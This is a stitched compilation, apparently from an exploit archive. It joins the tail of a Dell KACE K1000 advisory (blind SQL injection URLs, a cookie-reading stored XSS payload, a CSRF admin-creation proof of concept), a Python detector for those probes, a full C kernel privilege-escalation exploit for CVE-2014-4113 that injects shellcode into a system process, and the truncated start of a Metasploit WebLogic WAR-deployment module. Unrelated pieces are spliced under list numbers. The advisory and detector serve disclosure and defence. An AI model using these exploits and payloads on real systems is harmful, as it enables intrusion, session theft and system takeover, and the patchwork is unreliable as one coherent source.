Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.247.100/adminui/oval_list.php
Cookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0
Connection: close
Upgrade-Insecure-Requests: 1

2. The response to the above request shows some content with a content length of 32109 bytes:

3. It shows information about OVAL-ID#24253:

4. Now send the following payload, which tests this ID parameter for a true condition:

http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432

5. The response to the above request again shows information about the same OVAL-ID#24252:

6. Now, use the following payload to test this ID parameter for a false condition:

http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444

7. The response to the false condition is different from the response to the normal and/or true condition. This response does not show any information about any OVAL-ID:

8. These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.

=========================================================================
3. Stored Cross Site Scripting (XSS) Vulnerability (CVE-2018-5405)
=========================================================================

The Dell Kace K1000 fails to sanitize user input when creating a ticket. A least privileged user with ‘User Console Only’ rights could exploit this vulnerability to inject arbitrary JavaScript while creating tickets that would be executed when administrators or any other user view these tickets.

An authenticated least privileged user with ‘User Console Only’ rights can inject arbitrary JavaScript code on the tickets page. This script executes every time a user visits this page. This allows a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks.

#Proof-Of-Concept:
------------------

1. Log into the Dell Kace K1000 web interface as a least privileged user.

2. Navigate to Service Desk-->Tickets and create a new ticket.

3. Inject the following payload in the Summary section:

Test Ticket</textarea></div></div><script>alert("XSSinSummary");alert(document.cookie);</script><!--

4. Save the ticket.

5. Go back to tickets and view this newly created ticket, and a couple of alert boxes should pop up.

6. Any user, including administrator, visiting this ticket page would execute the injected script.

=========================================================================
4. Misconfigured CORS Vulnerability (CVE-2018-5406)
=========================================================================

The Dell Kace K1000 fails to implement Cross Origin Resource Sharing (CORS) properly, which leads to a Cross Site Request Forgery (CSRF) attack. An unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing the appliance’s settings. Also, a malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform sensitive actions such as adding a new administrator account or changing the appliance’s settings.

#Proof-Of-Concept:
------------------

1. Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under the Web Root of your Kali machine.

2. Log into the web interface of the appliance as admin.

3. Open a new tab in the same browser and access the HTML page from #1

4. Save the ticket.

5. Submit the request (This can be modified to submit the request automatically).

6. Check BurpSuite to see if the request to add user ‘Hacker’ was sent to the appliance and if it originated from your Kali machine

7. Check the admin console to see if user Hacker has been added:

===================================
#Vulnerability Disclosure Timeline:
===================================

04/2018: Submitted report to CERT-US.
04/2018: CERT-US reported the issue to vendor.
05/2018: Awaiting vendor response.
10/2018: Vendor asked to test the patch as they have fixed these issues already.
10/2018: Confirmed that all the vulnerabilities except Vulnerability#2 are fixed in 9.0.270, and that it still exists in other patched versions.
01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019, and asked to publish this on June 01 2019 so that customers have enough time to patch.
05/2019: Vendor published an advisory.
06/2019: CERT-US published a Vulnerability Note, VU#877837.
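A log-side check for the two blind SQL injection endpoints in the advisory above, written as an added example (not part of the advisory or the vendor's tooling). Both 'selvalue' and 'ID' normally carry a plain integer, so the script parses Combined Log Format lines (an assumption about the log layout) and flags any request whose value is not an integer; the sample log lines are constructed for illustration.

```python
"""Scan web-server access logs for the KACE SMA blind SQL injection probes
described in the advisory (CVE-2018-5404).  Added example, not part of the
advisory; the log lines at the bottom are constructed for illustration."""
import re
from urllib.parse import parse_qs, urlsplit

# The two endpoints the advisory names, with the parameter each one takes.
# In normal use both carry a plain integer ID (selvalue=13, ID=6200), so any
# other character in the value is a strong signal of a probe such as 13'
# or 6200 AND 6432=6432.
NUMERIC_PARAMS = {
    "/common/ajax_lookup_list.php": "selvalue",
    "/adminui/oval_detail.php": "ID",
}
INTEGER = re.compile(r"^\d+$")

# Apache/nginx Combined Log Format (assumed); only the fields used are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def check_line(line):
    """Return a finding string for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    param = NUMERIC_PARAMS.get(url.path)
    if param is None:
        return None
    # parse_qs percent-decodes and turns '+' into spaces, so the value is
    # compared in the form the application itself would see.
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        if not INTEGER.match(value):
            return (f"{m.group('ts')} {m.group('ip')} {url.path} "
                    f"{param}={value!r} is not an integer "
                    f"(blind SQLi probe?), HTTP {m.group('status')}")
    return None


def scan(lines):
    """Run check_line over an iterable of log lines; return the findings."""
    return [f for f in (check_line(l) for l in lines) if f]


# Constructed sample: a baseline request, the advisory's 13' and 13''
# probes, a boolean-condition probe on oval_detail.php, and benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2018:10:00:01 -0400] "GET /common/ajax_lookup_list.php?query_type=submitter&selvalue=13&queue_id=1&org_id=1 HTTP/1.1" 200 412
10.0.0.5 - - [12/Apr/2018:10:00:07 -0400] "GET /common/ajax_lookup_list.php?query_type=submitter&selvalue=13%27&queue_id=1&org_id=1 HTTP/1.1" 302 0
10.0.0.5 - - [12/Apr/2018:10:00:09 -0400] "GET /common/ajax_lookup_list.php?query_type=submitter&selvalue=13%27%27&queue_id=1&org_id=1 HTTP/1.1" 200 412
10.0.0.7 - - [12/Apr/2018:10:01:12 -0400] "GET /adminui/oval_detail.php?ID=6200+AND+6432%3D6432 HTTP/1.1" 200 32109
10.0.0.7 - - [12/Apr/2018:10:01:30 -0400] "GET /adminui/oval_detail.php?ID=6200 HTTP/1.1" 200 32109
10.0.0.9 - - [12/Apr/2018:10:02:00 -0400] "GET /userui/ticket.php?QUEUE_ID=1 HTTP/1.1" 200 8801
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only GET query strings are visible in an access log, so this covers the two SQL injection items; the stored XSS payload in the ticket Summary travels in a POST body and needs an application-level or WAF log to catch.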
  14. #include "hd.h"
// EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46945.rar

byte __s_code[]={
    0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 ,
    0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 ,
    0x4C ,0x89 ,0x70 ,0x10 ,0x90 ,0x65 ,0x48 ,0x8B ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8B ,
    0x40 ,0x60 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x8B ,0x78 ,0x18 ,0x48 ,0x8B ,0x47 ,0x10 ,0x48 ,0x83 ,
    0xC7 ,0x10 ,0x48 ,0x3B ,0xC7 ,0x0F ,0x84 ,0x99 ,0x01 ,0x00 ,0x00 ,0x48 ,0xBB ,0x65 ,0x00 ,0x6C ,
    0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x48 ,0xBE ,0x2E ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x6C ,0x00 ,0x49 ,
    0xBA ,0x6B ,0x00 ,0x65 ,0x00 ,0x72 ,0x00 ,0x6E ,0x00 ,0x48 ,0xBD ,0x4B ,0x00 ,0x45 ,0x00 ,0x52 ,
    0x00 ,0x4E ,0x00 ,0x49 ,0xB8 ,0x45 ,0x00 ,0x4C ,0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x49 ,0xB9 ,0x2E ,
    0x00 ,0x44 ,0x00 ,0x4C ,0x00 ,0x4C ,0x00 ,0x66 ,0x0F ,0x1F ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,
    0x66 ,0x83 ,0x78 ,0x58 ,0x18 ,0x48 ,0x8B ,0x48 ,0x60 ,0x72 ,0x25 ,0x48 ,0x8B ,0x11 ,0x49 ,0x3B ,
    0xD2 ,0x75 ,0x0C ,0x48 ,0x39 ,0x59 ,0x08 ,0x75 ,0x06 ,0x48 ,0x39 ,0x71 ,0x10 ,0x74 ,0x1E ,0x48 ,
    0x3B ,0xD5 ,0x75 ,0x0C ,0x4C ,0x39 ,0x41 ,0x08 ,0x75 ,0x06 ,0x4C ,0x39 ,0x49 ,0x10 ,0x74 ,0x0D ,
    0x48 ,0x8B ,0x00 ,0x48 ,0x3B ,0xC7 ,0x75 ,0xC8 ,0xE9 ,0x17 ,0x01 ,0x00 ,0x00 ,0x48 ,0x8B ,0x78 ,
    0x30 ,0x48 ,0x85 ,0xFF ,0x0F ,0x84 ,0x0A ,0x01 ,0x00 ,0x00 ,0x48 ,0x63 ,0x47 ,0x3C ,0xB9 ,0x4D ,
    0x5A ,0x00 ,0x00 ,0x66 ,0x39 ,0x0F ,0x0F ,0x85 ,0xF8 ,0x00 ,0x00 ,0x00 ,0x81 ,0x3C ,0x38 ,0x50 ,
    0x45 ,0x00 ,0x00 ,0x0F ,0x85 ,0xEB ,0x00 ,0x00 ,0x00 ,0x44 ,0x8B ,0x8C ,0x38 ,0x88 ,0x00 ,0x00 ,
    0x00 ,0x49 ,0x8B ,0xD6 ,0x4C ,0x03 ,0xCF ,0x45 ,0x8B ,0x41 ,0x20 ,0x41 ,0x8B ,0x49 ,0x18 ,0x4C ,
    0x03 ,0xC7 ,0x48 ,0x85 ,0xC9 ,0x74 ,0x32 ,0x48 ,0xBB ,0x43 ,0x72 ,0x65 ,0x61 ,0x74 ,0x65 ,0x50 ,
    0x72 ,0x49 ,0xBA ,0x72 ,0x6F ,0x63 ,0x65 ,0x73 ,0x73 ,0x41 ,0x00 ,0x0F ,0x1F ,0x44 ,0x00 ,0x00 ,
    0x41 ,0x8B ,0x04 ,0x90 ,0x48 ,0x39 ,0x1C ,0x38 ,0x75 ,0x07 ,0x4C ,0x39 ,0x54 ,0x38 ,0x07 ,0x74 ,
    0x08 ,0x48 ,0xFF ,0xC2 ,0x48 ,0x3B ,0xD1 ,0x72 ,0xE7 ,0x33 ,0xC0 ,0x48 ,0x3B ,0xD1 ,0x0F ,0x83 ,
    0x92 ,0x00 ,0x00 ,0x00 ,0x41 ,0x8B ,0x49 ,0x24 ,0x45 ,0x33 ,0xC0 ,0x48 ,0x03 ,0xCF ,0x0F ,0xB7 ,
    0x14 ,0x51 ,0x41 ,0x8B ,0x49 ,0x1C ,0x45 ,0x33 ,0xC9 ,0x48 ,0x03 ,0xCF ,0x44 ,0x8B ,0x14 ,0x91 ,
    0x48 ,0x89 ,0x44 ,0x24 ,0x58 ,0x48 ,0x89 ,0x44 ,0x24 ,0x60 ,0x4C ,0x03 ,0xD7 ,0x48 ,0x8D ,0x7C ,
    0x24 ,0x70 ,0xB9 ,0x68 ,0x00 ,0x00 ,0x00 ,0xF3 ,0xAA ,0xB8 ,0x05 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,
    0xD3 ,0x66 ,0x89 ,0x84 ,0x24 ,0xB0 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8D ,0x44 ,0x24 ,0x50 ,0x33 ,0xC9 ,
    0x48 ,0x89 ,0x44 ,0x24 ,0x48 ,0x48 ,0x8D ,0x44 ,0x24 ,0x70 ,0x4C ,0x89 ,0x74 ,0x24 ,0x50 ,0x48 ,
    0x89 ,0x44 ,0x24 ,0x40 ,0x4C ,0x89 ,0x74 ,0x24 ,0x38 ,0x4C ,0x89 ,0x74 ,0x24 ,0x30 ,0xC7 ,0x44 ,
    0x24 ,0x28 ,0x10 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x70 ,0x68 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x84 ,
    0x24 ,0xAC ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x20 ,0x01 ,0x00 ,0x00 ,
    0x00 ,0x41 ,0xFF ,0xD2 ,0x33 ,0xC0 ,0x4C ,0x8D ,0x9C ,0x24 ,0xE0 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,
    0x5B ,0x20 ,0x49 ,0x8B ,0x6B ,0x38 ,0x49 ,0x8B ,0xE3 ,0x41 ,0x5E ,0x5F ,0x5E ,0xC3
};

HMENU __init_menu( )
{
    HMENU hMenu_Ret=NULL;
    MENUITEMINFO mItem={0};
    do
    {
        HMENU hme=CreatePopupMenu();
        if (hme==NULL){
            printf("CreatePopupMenu()_1 fail:0x%x\n" ,GetLastError());
            break;
        }
        mItem.cbSize=sizeof(MENUITEMINFO);
        mItem.fMask=(MIIM_STRING);
        bool bisok=InsertMenuItem(hme ,0 ,1 ,&mItem);
        if (bisok==false){
            printf("InsertMenuItem()_1 fail:0x%x\n" ,GetLastError());
            break;
        }
        hMenu_Ret=CreatePopupMenu();
        if (hMenu_Ret==NULL){
            printf("CreatePopupMenu()_2 fail:0x%x\n" ,GetLastError());
            break;
        }
        MENUITEMINFO mi={0};
        mi.cbSize=sizeof(mi);
        mi.fMask=(MIIM_STRING|MIIM_SUBMENU);
        mi.hSubMenu=hme;
        mi.dwTypeData="";
        mi.cch=1;
        bisok=InsertMenuItem(hMenu_Ret ,0 ,1 ,&mi);
        if (bisok==false){
            printf("InsertMenuItem()_2 fail: 0x%x\n" ,GetLastError());
        }
    } while (false);
    return hMenu_Ret;
}

PVOID __calc_sep_token_addr( )
{
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION handleInfo=NULL;
    ULONGLONG handleInfoSize = 0x10000 ,i ,ret_obj_addr=NULL;
    do
    {
        _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");
        _NtDuplicateObject NtDuplicateObject = (_NtDuplicateObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtDuplicateObject");
        _NtQueryObject NtQueryObject = (_NtQueryObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQueryObject");
        if (!NtQuerySystemInformation || !NtDuplicateObject || !NtQueryObject){
            printf("get sys proc failed!\n");
            break;
        }
        handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
        while ((status = NtQuerySystemInformation(SystemHandleInformation,handleInfo, handleInfoSize,NULL)) == STATUS_INFO_LENGTH_MISMATCH)
            handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
        if (!NT_SUCCESS(status)){
            printf("NtQuerySystemInformation failed!\n");
            break;
        }
        POBJECT_TYPE_INFORMATION objectTypeInfo=(POBJECT_TYPE_INFORMATION)malloc(0x1000);
        for (i = 0; i < handleInfo->HandleCount; i++)
        {
            SYSTEM_HANDLE handle = handleInfo->Handles[i];
            if (handle.ProcessId != GetCurrentProcessId())
                continue;
            if (!NT_SUCCESS(NtQueryObject( (HANDLE)handle.Handle, ObjectTypeInformation, objectTypeInfo, 0x1000, NULL ))) {
                printf("[%#x] Error!\n", handle.Handle);
                continue;
            }
            if (objectTypeInfo->Name.Buffer==NULL || objectTypeInfo->Name.Length==0)
                continue;
            if (wcscmp(objectTypeInfo->Name.Buffer ,L"Token"))
                continue;
            ret_obj_addr=((ULONGLONG)handle.Object+0x40);
        }
        if (objectTypeInfo) free(objectTypeInfo);
        if (handleInfo) free(handleInfo);
    } while (false);
    return (PVOID)ret_obj_addr;
}

ULONGLONG __calc_pid( )
{
    NTSTATUS status;
    PSYSTEM_PROCESS_INFORMATION PsInfo=NULL;
    ULONGLONG PsInfoSize = 0x10000 ,ret_pid=NULL;
    do
    {
        _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");
        if (!NtQuerySystemInformation){
            printf("get sys proc failed!\n");
            break;
        }
        PsInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(PsInfoSize);
        while ((status = NtQuerySystemInformation(SystemProcessesAndThreadsInformation,PsInfo, PsInfoSize ,NULL)) == STATUS_INFO_LENGTH_MISMATCH)
            PsInfo = (PSYSTEM_PROCESS_INFORMATION)realloc(PsInfo, PsInfoSize*= 2);
        if (!NT_SUCCESS(status)){
            printf("NtQuerySystemInformation failed!\n");
            break;
        }
        for (;PsInfo->NextEntryDelta ;PsInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONGLONG)PsInfo + PsInfo->NextEntryDelta))
        {
            if (PsInfo->ProcessName.Buffer==NULL || PsInfo->ProcessName.Length==0)
                continue;
            if (!wcscmp(PsInfo->ProcessName.Buffer ,L"winlogon.exe")){
                ret_pid=PsInfo->InheritedFromProcessId;
                break;
            }
        }
    } while (false);
    return ret_pid;
}

ULONGLONG __init_fake_wnd_pti( )
{
    ULONGLONG ret_pti=NULL;
    ULONGLONG dst_proc_addr=NULL;
    do
    {
        ret_pti=(ULONGLONG)malloc(0x500);
        if (ret_pti==NULL){
            printf("malloc fail!\n");
            return NULL;
        }
        *(ULONGLONG*)(ret_pti+_oft_win32ps_pti)=0;     //Win32Process
        *(DWORD*)(ret_pti+_oft_0420h_pti)=0;           //not 0x20
        *(ULONGLONG*)(ret_pti+_oft_list_header_pti)=(ULONGLONG)__calc_sep_token_addr()-0x5;   //TODO:
        void* tmpbuf=malloc(0x100);
        memset(tmpbuf ,0 ,0x100);
        *(ULONGLONG*)(ret_pti+_oft_0188h_pti)=(ULONGLONG)tmpbuf;   //buf addr(size >= 0x12) ,check in win32k!SetWakeBit
    } while (false);
    return ret_pti;
}

bool __init_fake_tagWnd( )
{
    bool bRet=false;
    _ZwAllocateVirtualMemory_pt pfn_ZwAllocateVm=NULL;
    do
    {
        HMODULE hmd=LoadLibrary("ntdll.dll");
        if (hmd==NULL)
            break;
        ULONGLONG fake_tagwnd_pti=__init_fake_wnd_pti();
        if (fake_tagwnd_pti==NULL){
            printf("__calc_wnd_pti() fail!\n");
            break;
        }
        pfn_ZwAllocateVm=(_ZwAllocateVirtualMemory_pt)GetProcAddress(hmd ,"ZwAllocateVirtualMemory");
        if (pfn_ZwAllocateVm==NULL){
            printf("pfn ZwAllocateVirtualMemory addr is NULL!\n");
            break;
        }
        BYTE* fake_tagWnd_addr=(BYTE*)0xFFFFFFFB;
        size_t region_size=0x20000;
        NTSTATUS status=pfn_ZwAllocateVm(GetCurrentProcess() ,(PVOID*)&fake_tagWnd_addr ,0 ,&region_size, MEM_RESERVE | MEM_COMMIT|MEM_TOP_DOWN ,PAGE_EXECUTE_READWRITE);
        if (status < 0){
            printf("Allocate fake tagWnd fail!\n");
            break;
        }
        ULONGLONG ul_align=0xFFFFFFFBLL-(ULONGLONG)fake_tagWnd_addr;
        if (ul_align > 0x10000){
            printf("alloc fake fail: %x!\n" ,fake_tagWnd_addr);
            break;
        }
        memset(fake_tagWnd_addr+ul_align ,0 ,0x1000);
        *(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_idx_tagWND)=0x0;
        *(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_pti_tagWnd)=fake_tagwnd_pti;   //oft 0x170 == win32process
        *(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_18h_tagWnd)=0x0;               //0 ,check in IsWindowDesktopComposed
        bRet=true;
    } while (false);
    return bRet;
}

LRESULT __stdcall __wh_wnd_proc( int code, WPARAM wparam, LPARAM lparam )
{
    do
    {
        CWPSTRUCT* lpm=(CWPSTRUCT*)lparam;
        if (lpm->message != MN_FINDWINDOWFROMPOINT || g_bis_mn_findwnded==true)
            break;
        g_bis_mn_findwnded=true;
        UnhookWindowsHook(WH_CALLWNDPROC ,__wh_wnd_proc);
        g_ori_wnd_proc=(WNDPROC)SetWindowLongPtr(lpm->hwnd ,GWLP_WNDPROC ,(LONG_PTR)__wnd_proc_sl);
    } while (false);
    return CallNextHookEx(g_hhk ,code ,wparam ,lparam);
}

LRESULT __wnd_proc_sl( HWND hwnd, UINT umsg, WPARAM wparam, LPARAM lparam )
{
    do
    {
        if (umsg != MN_FINDWINDOWFROMPOINT )
            break;
        if (g_bis_endmenu)
            break;
        g_bis_endmenu=1;
        EndMenu();
        return 0xFFFFFFFB;
    } while (false);
    return CallWindowProc(g_ori_wnd_proc ,hwnd ,umsg ,wparam ,lparam);
}

LRESULT __stdcall __wnd_proc( HWND hwnd, UINT umsg, WPARAM wparam, LPARAM lparam )
{
    if (umsg==WM_ENTERIDLE && g_bis_idled==FALSE)
    {
        g_bis_idled=TRUE;
        PostMessage(hwnd ,WM_KEYFIRST ,0x28 ,0);
        PostMessage(hwnd ,WM_KEYFIRST ,0X27 ,0);
        PostMessage(hwnd ,WM_LBUTTONDOWN ,0 ,0xff00ff);
    }
    return DefWindowProc(hwnd ,umsg ,wparam ,lparam);
}

DWORD __stdcall __thread_plroc( void* param )
{
    bool bisok=false;
    WNDCLASS wndcls={0};
    do
    {
        wndcls.lpfnWndProc=__wnd_proc;
        wndcls.lpszClassName="cve_2014_4113";
        RegisterClass(&wndcls);
        HWND hwnd=CreateWindowEx(0 ,wndcls.lpszClassName ,NULL ,0 ,0 ,0, 200 ,200 ,NULL ,NULL ,NULL ,NULL);
        if (hwnd==NULL){
            printf("CreateWindowEx() fail: 0x%x\n" ,GetLastError());
            break;
        }
        HMENU hmenu=__init_menu();
        if (hmenu==NULL){
            printf("__init_menu() fail: 0x%x\n" ,GetLastError());
            break;
        }
        // reuse the function-scope bisok instead of re-declaring it inside the loop
        bisok=__init_fake_tagWnd();
        if (bisok==false){
            printf("__init_fake_tagWnd() fail:0x%x\n" ,GetLastError());
            break;
        }
        g_hhk=SetWindowsHookEx(WH_CALLWNDPROC ,__wh_wnd_proc ,NULL ,GetCurrentThreadId());
        if (g_hhk==NULL){
            printf("SetWindowsHookEx() fail:0x%x\n" ,GetLastError());
            break;
        }
        bisok=TrackPopupMenu(hmenu ,0 ,0x0FFFFD8F0 ,0x0FFFFD8F0 ,0 ,hwnd ,NULL);
        if (bisok==false){
            printf("TrackPopupMenu() fail:0x%x\n" ,GetLastError());
            break;
        }
        CloseHandle(hmenu);
        DestroyWindow(hwnd);
    } while (FALSE);
    return 0;
}

int main( int argc ,char** argv )
{
    bool bisok=false;
    do
    {
        if (argc != 2){
            printf("usage: xxx fpath");
            break;
        }
        HANDLE hProcessToken=NULL ,hRestrictedToken=NULL;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hProcessToken)) {
            printf("Could not open process token\n");
            break;
        }
        if (!CreateRestrictedToken(hProcessToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, &hRestrictedToken)){
            printf("Could not create restricted token\n");
            break;
        }
        if (!AdjustTokenPrivileges(hRestrictedToken, TRUE, NULL, 0, NULL, NULL)) {
            printf("Could not adjust privileges\n");
            break;
        }
        CloseHandle(hProcessToken);
        HANDLE hthread=CreateThread(NULL ,0 ,__thread_plroc ,NULL ,0 ,NULL);
        if (hthread==NULL){
            printf("CreateThread() fail: 0x%x\n" ,GetLastError());
            break;
        }
        WaitForSingleObject(hthread ,1000);
        TerminateThread(hthread ,0);
        if (!ImpersonateLoggedOnUser(hRestrictedToken)){
            printf("ImpersonateLoggedOnUser failed!\n");
            break;
        }
        PVOID pfn_cps=GetProcAddress(LoadLibrary("Kernel32.dll") ,"CreateProcessA");
        if (pfn_cps==NULL){
            printf("GetProcess CreateProcessA failed!\n");
            break;
        }
        ULONGLONG ul_pid_winlogon=__calc_pid();
        if (ul_pid_winlogon==NULL){
            printf("__calc_winlogon_pid failed!\n");
            break;
        }
        HANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS ,TRUE ,ul_pid_winlogon);
        if (hprocess==NULL){
            printf("OpenProcess failed: %x\n" ,GetLastError());
            break;
        }
        //init params
        PVOID params=VirtualAllocEx(hprocess ,NULL ,strlen(argv[1])+10 ,MEM_COMMIT ,PAGE_READWRITE);
        if (params==NULL){
            printf("VirtualAllocEx failed:%x\n" ,GetLastError());
            break;
        }
        ULONGLONG ul_ret_wrt=0;
        bisok=WriteProcessMemory(hprocess ,params ,argv[1] ,strlen(argv[1])+2 ,(SIZE_T*)&ul_ret_wrt);
        if (bisok==false || ul_ret_wrt < strlen(argv[1])+2){
            printf("WriteProcessMemory() failed!\n");
            break;
        }
        //init shellcode
        PVOID shellcode=VirtualAllocEx(hprocess ,NULL ,0x220 ,MEM_COMMIT ,PAGE_EXECUTE_READWRITE);
        if (shellcode==NULL){
            printf("VirtualAllocEx failed:%x\n" ,GetLastError());
            break;
        }
        bisok=WriteProcessMemory(hprocess ,shellcode ,__s_code ,sizeof(__s_code) ,(SIZE_T*)&ul_ret_wrt);
        if (bisok==false || ul_ret_wrt < sizeof(__s_code)){
            printf("WriteProcessMemory() failed!\n");
            break;
        }
        DWORD dw_tid=0;
        HANDLE htd_rmt=CreateRemoteThread(hprocess ,NULL ,0 ,(LPTHREAD_START_ROUTINE )shellcode ,params ,0 ,&dw_tid);
        if (htd_rmt==NULL){
            printf("CreateRemoteThread() fail!\n");
            break;
        }
        //clear
        CloseHandle(htd_rmt);
        CloseHandle(hprocess);
        CloseHandle(hRestrictedToken);
    } while (false);
    return 0;
}
  15. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',
      'Description'    => %q{
        This module abuses a feature in WebLogic Server's Administration Console to install
        a malicious Java application in order to gain remote code execution. Authentication
        is required, however by default, Oracle ships with a "oats" account that you could
        log in with, which grants you administrator access.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Steven Seeley', # Used the trick and told me about it
          'sinn3r'         # Metasploit module
        ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'WebLogic Server Administration Console 12 or prior', { } ]
        ],
      'References'     =>
        [
          # The CVE description matches what this exploit is doing, but it was for version
          # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.
          # ['CVE', '2007-2699']
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8088
        },
      'Notes'          =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 13 2019',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
        OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),
        OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])
      ])

    register_advanced_options(
      [
        OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
      ])
  end

  class LoginSpec
    attr_accessor :admin_console_session
  end

  def login_spec
    @login_spec ||= LoginSpec.new
  end

  class OatsWarPayload < MetasploitModule
    attr_reader :name
    attr_reader :war

    def initialize(payload)
      @name = [Faker::App.name, Rex::Text.rand_name].sample
      @war = payload.encoded_war(app_name: name).to_s
    end
  end

  def default_oats_path
    datastore['DefaultOatsPath']
  end

  def war_payload
    @war_payload ||= OatsWarPayload.new(payload)
  end

